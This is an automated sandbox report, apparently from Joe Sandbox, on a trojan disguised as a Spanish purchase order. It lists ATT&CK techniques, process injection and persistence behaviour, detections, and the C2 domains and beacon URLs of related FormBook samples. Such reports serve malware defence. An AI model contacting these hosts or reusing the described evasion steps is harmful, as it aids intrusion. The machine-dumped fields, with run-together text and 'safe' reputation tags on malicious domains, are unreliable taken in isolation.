          MITRE ATT&CK matrix, listed per tactic column (Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Techniques the report flagged carry the report's count badge in square brackets; the remaining entries are the unflagged cells of the matrix.

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
          Execution: Command and Scripting Interpreter [2]; Scheduled Task/Job [1]; Shared Modules [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
          Persistence: Scheduled Task/Job [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
          Privilege Escalation: Process Injection [812]; Scheduled Task/Job [1]; Abuse Elevation Control Mechanism [1]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
          Defense Evasion: Masquerading [11]; Disable or Modify Tools [11]; Virtualization/Sandbox Evasion [41]; Process Injection [812]; Deobfuscate/Decode Files or Information [1]; Abuse Elevation Control Mechanism [1]; Obfuscated Files or Information [4]; Rundll32 [1]; Software Packing [12]; DLL Side-Loading [1]
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
          Discovery: System Time Discovery [1]; Security Software Discovery [321]; Process Discovery [2]; Virtualization/Sandbox Evasion [41]; Application Window Discovery [1]; File and Directory Discovery [2]; System Information Discovery [213]; System Owner/User Discovery; Network Sniffing; Network Service Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
          Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
          Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [4]; Non-Application Layer Protocol [3]; Application Layer Protocol [13]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
          Behavior Graph ID: 1467133 | Sample: Orden de compra 0307AR24.exe | Startdate: 03/07/2024 | Architecture: WINDOWS | Score: 100

          Behavior graph, rendered as a process tree (the graph image itself is not reproduced here):

          Start
            DNS/IP: www.mzhhxxff.xyz; www.a1b5v.xyz (signature: Performs DNS queries to domains with low reputation); 14 other IPs or domains
            Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
            Orden de compra 0307AR24.exe (started)
              Dropped: C:\Users\user\AppData\...\RggSaCWUvAyNK.exe (PE32); C:\...\RggSaCWUvAyNK.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp362B.tmp (XML); C:\Users\...\Orden de compra 0307AR24.exe.log (ASCII)
              Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
              RegSvcs.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
                explorer.exe (injected)
                  DNS/IP: www.ux-design-courses-17184.bond 185.53.179.92, 49724, 80 TEAMINTERNET-ASDE Germany; theopencomputeproject.net 15.197.142.173, 49734, 80 TANDEMUS United States; 4 other IPs or domains
                  Signatures: System process connects to network (likely due to code injection or exploit)
                  systray.exe (started)
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
                    cmd.exe (started)
                      conhost.exe (started)
                  rundll32.exe (started)
                  autoconv.exe (started)
              powershell.exe (started)
                Signatures: Loading BitLocker PowerShell Module
                conhost.exe (started)
                WmiPrvSE.exe (started)
              powershell.exe (started)
                conhost.exe (started)
              schtasks.exe (started)
                conhost.exe (started)
            RggSaCWUvAyNK.exe (started)
              Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
              RegSvcs.exe (started)
                Signatures: Found direct / indirect Syscall (likely to bypass EDR)
              schtasks.exe (started)
                conhost.exe (started)

          Source | Detection | Scanner | Label | Link
          Orden de compra 0307AR24.exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
          Orden de compra 0307AR24.exe | 100% | Joe Sandbox ML

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | 100% | Joe Sandbox ML
          C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | 26% | ReversingLabs | Win32.Trojan.Generic

          No Antivirus matches
          No Antivirus matches

          Source | Detection | Scanner | Label | Link
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                          http://www.hecxion.xyz/md02/www.theopencomputeproject.netexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.webuyandsellpa.comReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.microexplorer.exe, 0000000A.00000000.2149371209.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4553241787.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2158143690.0000000007B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.117myw.com/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.a1b5v.xyzReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.z8ggd.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.upcyclecharms.com/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.woby.xyz/md02/www.rnwaifu.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.z8ggd.com/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.mzhhxxff.xyzexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.mzhhxxff.xyzReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.ux-design-courses-17184.bondReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.theopencomputeproject.netexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.z8ggd.com/md02/www.equipoleiremnacional.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.coloradoskinwellness.comReferer:explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://excel.office.com-explorer.exe, 0000000A.00000000.2168253854.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.117myw.comexplorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0Orden de compra 0307AR24.exe, RggSaCWUvAyNK.exe.0.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://powerpoint.office.comEMdexplorer.exe, 0000000A.00000000.2168253854.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4557583157.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.a1b5v.xyz/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 0000000A.00000002.4552147764.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156905915.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.family-lawyers-7009103.world/md02/explorer.exe, 0000000A.00000003.2984770862.000000000C50A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4558523811.000000000C4CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2979095250.000000000C50A000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467133
Start date and time: 2024-07-03 18:31:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Orden de compra 0307AR24.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@814/15@11/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 144
• Number of non-executed functions: 333
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time; the report may be missing disassembly code information.
• Report size exceeded the maximum capacity; the report may be missing behavior information.
• Report size exceeded the maximum capacity; the report may be missing disassembly code.
• Report size getting too big: too many NtCreateKey calls found.
• Report size getting too big: too many NtEnumerateKey calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• VT rate limit hit for: Orden de compra 0307AR24.exe
Time      Type             Description
12:31:54  API Interceptor  1x Sleep call for process: Orden de compra 0307AR24.exe modified
12:31:59  API Interceptor  29x Sleep call for process: powershell.exe modified
12:32:00  API Interceptor  9782849x Sleep call for process: explorer.exe modified
12:32:02  API Interceptor  1x Sleep call for process: RggSaCWUvAyNK.exe modified
12:32:43  API Interceptor  8972407x Sleep call for process: systray.exe modified
18:32:01  Task Scheduler   Run new task: RggSaCWUvAyNK path: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          192.250.227.27jpgcamscanner_20240521_0072345_JPEG.bat.exeGet hashmaliciousGuLoaderBrowse
                                          • veysiseker.com/FOB.bin
                                          198.185.159.144Att00173994.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                                          • www.2thetcleaningservice.com/mc10/?FPWhWLW=JxJ83Varoc/pDqX/ejTG8SZAK8Thxjdz6WwKL+xsDsFdju7eAxYDUbfmaSdrJy7HwmgH2Kq9Hg==&AlB=8pdT8tsp
                                          2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                          • www.lostaino.com/ts59/?7n=CMI3XAkyIIc+lbzQFM0yBiMxIQj45W/6BGDFfPoe8SD5h+4DN1QfAHIl1f4AVZ60VX6NCS7/mA==&2d8=3fe8kxnx8zVX-2L
                                          INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                          • www.amycostellospeech.com/ps94/?F8LpzZ=Z8xr6Td5qC+h9r+P8xpcNx+5AFGRik/pzejMl2EQ43koTqqLsxs6TtkvjcUWJXi0kPax//YTLQ==&XPa=ABZ4lrqh9bG4uhdP
                                          Att0027592.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • www.bankablebark.com/dy13/?jDHph=9ZSG7Fw6wFJMggGvtga1Qh3mQQl9Rgy3K16+Oe6KY82/n3IrznmlP/WDuEbFz6mxdG1sfeS45g==&Wt=IBZX4leh3ZCl
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                          • www.wearelemonpepper.com/e72r/
                                          IZPnmcCu5EZWa98.exeGet hashmaliciousFormBookBrowse
                                          • www.nearmeacupuncture.com/dy13/?Rzr=Lbyx94Ip0tNX&alI=COXK5yT9Xx7VrCeWTqQC1HikmuY3GWnRD5VN4SaGvnHzB3wzqzXgI63okZhLDtLx1kx2
                                          unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.wearelemonpepper.com/aqhg/
                                          185.53.179.92Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeGet hashmaliciousFormBookBrowse
                                          • www.hemophilia-treatment-41433.bond/pz12/?Ft6LPF=I28W/3a7leZLTJTVQ6pLzOFASFQBM/RHJVT607x5WCzJ2jZGT2NOi6Mb2MIHH5pYEuLB&Ev2=OjrLPv0Hh4WLu
                                          PO_0049_&_0050.xlsGet hashmaliciousFormBookBrowse
                                          • www.family-doctor-30030.com/my28/?h2Jdv=79IGywBWJhGw8mHY4Ed55Qbw0iEgtBEh+S8JDPa/nYZjsEVgaC4IJbnYN4OFlpxaLyr5Lg==&9rQ=c48da8_XbVvlJH8
                                          E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?l4DHGh=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&p41P=mVDhw
                                          Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?FD=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&8psPYP=k4Hh
                                          E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?f8HLWH=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&0T=Z87P2TP
                                          Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?k4p=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&ijc=1bxDp
                                          Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?q4=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&5jdh=DPxH-Ti82
                                          E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?_fvPp=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&6lo8sx=KtF83LWPF
                                          Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.cruises-62138.bond/my26/?p0GXBjhh=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&a2M4_=p6zhqZXh8fXtT
                                          documents.exeGet hashmaliciousFormBookBrowse
                                          • www.dental-implants-67128.com/m82/?KrqT=g4STjb_HNLxln&1bK8=jznEly5c4zUjvuzMiM7ybihkFEHMyYsqyLnHFEG0p8DHrY+6vbbqUGzxXxElKz/zJY4r
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ssl1.prod.systemdragon.comorder-payment094093.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 104.18.188.223
                                          SecuriteInfo.com.FileRepMalware.16340.31219.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                          • 104.17.158.1
                                          IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exeGet hashmaliciousFormBookBrowse
                                          • 104.17.157.1
                                          wLlREXsA9M.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 104.17.157.1
                                          sOjxIU25DP.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 104.17.157.1
                                          hi38VYWujz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 104.17.158.1
                                          Payment_document.docx.docGet hashmaliciousFormBookBrowse
                                          • 104.17.158.1
                                          E-dekont_pdf.exeGet hashmaliciousFormBookBrowse
                                          • 104.17.157.1
                                          E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 104.17.158.1
                                          PO_3534272.exeGet hashmaliciousFormBookBrowse
                                          • 104.17.157.1
                                           Match: ext-sq.squarespace.com
                                           • Att00173994.exe | malicious | FormBook | 198.185.159.144
                                           • disjR92Xrrnc3aZ.exe | malicious | FormBook | 198.185.159.144
                                           • 2024 Lusail Fence-WITH STICKER-2-003.exe | malicious | FormBook | 198.185.159.144
                                           • INVOICE - MV CNC BANGKOK - ST24PJ-278.exe | malicious | FormBook | 198.185.159.144
                                           • Att0027592.exe | malicious | FormBook | 198.185.159.144
                                           • kpCSGLBxAw2RnrW.exe | malicious | FormBook | 198.185.159.144
                                           • DHL_AWB#6078538091.exe | malicious | FormBook | 198.185.159.144
                                           • MT103-746394.doc | malicious | FormBook | 198.185.159.144
                                           • SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtf | malicious | FormBook | 198.185.159.145
                                           • AWB_NO_907853880911.exe | malicious | FormBook | 198.185.159.144
                                           Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                           Match: CNSV-LLCUS
                                           • 8hd98EhtIFcYkb8.exe | malicious | FormBook | 192.250.231.28
                                           • 8eBzSB5cmamfLKJ.exe | malicious | FormBook | 192.250.231.28
                                           • Urgent Quotation_pdf.exe | malicious | FormBook | 192.250.231.28
                                           • Products volume.exe | malicious | FormBook | 192.250.231.28
                                           • 245087609-050738-sanlccjavap0003-1240_pdf .exe | malicious | AgentTesla, PureLog Stealer | 192.250.227.25
                                           • e-DEKONT.exe | malicious | AgentTesla | 192.250.227.28
                                           • SecuriteInfo.com.Win32.PWSX-gen.1159.5272.exe | malicious | AgentTesla | 192.250.232.15
                                           • jpgcamscanner_20240521_0072345_JPEG.bat.exe | malicious | GuLoader | 192.250.227.27
                                           • quotation.doc | malicious | Unknown | 192.250.227.28
                                           • z8s945rPmZ.exe | malicious | SystemBC | 192.250.234.71
                                           Match: SQUARESPACEUS
                                           • Att00173994.exe | malicious | FormBook | 198.185.159.144
                                           • disjR92Xrrnc3aZ.exe | malicious | FormBook | 198.185.159.144
                                           • http://scarlet-marigold-h469.squarespace.com/ | malicious | Unknown | 198.185.159.177
                                           • 2024 Lusail Fence-WITH STICKER-2-003.exe | malicious | FormBook | 198.185.159.144
                                           • INVOICE - MV CNC BANGKOK - ST24PJ-278.exe | malicious | FormBook | 198.185.159.144
                                           • Att0027592.exe | malicious | FormBook | 198.185.159.144
                                           • kpCSGLBxAw2RnrW.exe | malicious | FormBook | 198.185.159.144
                                           • DHL_AWB#6078538091.exe | malicious | FormBook | 198.185.159.144
                                           • yq5xNPpWCT.exe | malicious | PureLog Stealer, SystemBC | 198.185.159.145
                                           • SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtf | malicious | FormBook | 198.185.159.145
                                           Match: CHINATELECOM-CORE-WAN-CN2ChinaTelecomNextGenerationCarr
                                           • pKqvOdh3Sv.elf | malicious | Mirai, Moobot | 123.170.2.151
                                           • jew.arm.elf | malicious | Unknown | 59.61.58.218
                                           • yUFX4wGvLW.elf | malicious | Mirai, Moobot | 123.179.76.202
                                           • 1CZlhmRsza.elf | malicious | Mirai, Moobot | 116.9.138.68
                                           • MRnwgdHLYk.elf | malicious | Mirai, Moobot | 117.39.92.9
                                           • GOoY5QBqvC.elf | malicious | Mirai, Moobot | 106.9.188.171
                                           • arm4-20240623-2204.elf | malicious | Mirai | 123.170.2.122
                                           • gt4t3NAdEr.elf | malicious | Mirai | 116.211.2.165
                                           • QSX0atAPpN.elf | malicious | Mirai | 117.38.62.166
                                           • GziBfLibYb.elf | malicious | Mirai | 222.87.211.74
                                           Match: TEAMINTERNET-ASDE
